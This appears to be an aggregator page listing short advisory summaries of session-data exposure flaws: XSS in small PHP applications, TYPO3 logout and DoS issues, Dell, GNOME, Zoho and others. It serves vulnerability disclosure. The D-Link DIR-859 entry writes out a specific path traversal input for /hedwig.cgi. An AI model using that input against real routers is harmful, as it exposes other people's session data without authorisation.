CVE-2024-8471

Cross-Site Scripting XSS vulnerability, whereby user-controlled input is not sufficiently encrypted. Exploitation of this vulnerability could allow an attacker to retrieve the session details of an authenticated user through JOBID and USERNAME parameters in /jobportal/process.php...

PT-2024-39038 · Unknown · Job Portal

Name of the Vulnerable Software and Affected Versions: Job Portal versions affected versions not specified Description: A Cross-Site Scripting XSS issue exists due to insufficient encryption of user-controlled input. This could allow an attacker to retrieve the session details of an authenticated...

CVE-2024-33994

Cross-Site Scripting XSS vulnerability in School Event Management System affecting version 1.0. An attacker could create a specially crafted URL and send it to a victim to obtain their session details via the 'view' parameter in '/event/index.php'...

CVE-2024-33993

Cross-Site Scripting XSS vulnerability in School Event Management System affecting version 1.0. An attacker could create a specially crafted URL and send it to a victim to obtain their session details via the 'view' parameter in /candidate/index.php'...

PT-2024-25625 · Unknown · School Management System

Name of the Vulnerable Software and Affected Versions: School Event Management System version 1.0 Description: The issue is related to a Cross-Site Scripting XSS vulnerability. An attacker could create a specially crafted URL and send it to a victim to obtain their session details via the view...

School Event Management System 跨站脚本漏洞

School Event Management System is a school event management system. A cross-site scripting vulnerability exists in School Event Management System version 1.0. An attacker can create a specially crafted URL and send it to a victim to obtain their session details via the "view" parameter in...

The vulnerability of the Windows Active Directory management and reporting software Zoho ManageEngine ADAudit Plus, related to access control deficiencies, allows a perpetrator to view data recorded by other users’ sessions.

The vulnerability of the Windows Active Directory AD management and reporting software Zoho ManageEngine ADAudit Plus is related to access control deficiencies. Exploiting this vulnerability could allow an attacker to view data recorded by other users’ sessions...

The vulnerability of the GNOME Remote Desktop remote connection package, related to the provision of data elements for erroneous sessions, allows a perpetrator to gain unauthorized access to protected information.

The vulnerability of the GNOME Remote Desktop remote connection package lies in the provision of a data element for erroneous sessions. Exploiting this vulnerability can allow an attacker operating remotely to gain unauthorized access to protected information...

Session Data Exposure

TYPO3 is vulnerable to session data exposure. The vulnerability is due to session data of authenticated frontend users being transformed into an anonymous user session during logout, allowing the next user to access previous session data...

CVE-2024-29175

Dell PowerProtect Data Domain, versions prior to 7.13.0.0, LTS 7.7.5.40, LTS 7.10.1.30 contain an weak cryptographic algorithm vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to man-in-the-middle attack that exposes sensitive session...

udn News Information Disclosure Vulnerability

udn News is a news application from China United News udn Inc. An information disclosure vulnerability exists in udn News versions prior to 4.20.1, which stems from storing a user's session in a logcat file during user login, which can be retrieved by a malicious attacker who can use it to log in...

VulnCheck KEV: CVE-2024-0769

D-Link DIR-859 routers contain a path traversal vulnerability in the file /hedwig.cgi of the component HTTP POST Request Handler. Manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml allows for the leakage of session data potentially enabling...

Denial Of Service (DoS)

TYPO3 is vulnerable to Denial Of Service DoS. The vulnerability is due to improper validation of anonymous user sessions in the built-in record registration functionality using recs URL parameters, allowing attackers to create an arbitrary amount of individual session-data records in the database...

PT-2024-37301 · Unknown · Soar Cloud Hr Portal

Name of the Vulnerable Software and Affected Versions: Soar Cloud HR Portal affected versions not specified Description: The issue concerns notification emails sent by Soar Cloud HR Portal, which contain a link with embedded session data. These emails are sent without using an encrypted...

GHSA-G585-CRJF-VHWQ TYPO3 Denial of Service in Frontend Record Registration

TYPO3’s built-in record registration functionality aka basic shopping cart using recs URL parameters is vulnerable to denial of service. Failing to properly ensure that anonymous user sessions are valid, attackers can use this vulnerability in order to create an arbitrary amount of individual...

GHSA-QR5F-6FCV-W69Q Typo3 Security Misconfiguration in Frontend Session Handling

It has been discovered session data of properly authenticated and logged in frontend users is kept and transformed into an anonymous user session during the logout process. This way the next user using the same client application gains access to previous session data...

GHSA-82VP-JR39-4J2J TYPO3 Security Misconfiguration in Frontend Session Handling

It has been discovered session data of properly authenticated and logged in frontend users is kept and transformed into an anonymous user session during the logout process. This way the next user using the same client application gains access to previous session data...

TYPO3 Denial of Service in Frontend Record Registration

TYPO3’s built-in record registration functionality aka “basic shopping cart” using recs URL parameters is vulnerable to denial of service. Failing to properly ensure that anonymous user sessions are valid, attackers can use this vulnerability in order to create an arbitrary amount of individual...

CVE-2024-5413

A vulnerability have been discovered in PhpMyBackupPro affecting version 2.3 that could allow an attacker to execute XSS through /phpmybackuppro/scheduled.php, all parameters. This vulnerabilities could allow an attacker to create a specially crafted URL and send it to a victim to retrieve their...

CVE-2024-5414

A vulnerability have been discovered in PhpMyBackupPro affecting version 2.3 that could allow an attacker to execute XSS through /phpmybackuppro/getfile.php, 'view' parameter. This vulnerabilities could allow an attacker to create a specially crafted URL and send it to a victim to retrieve their...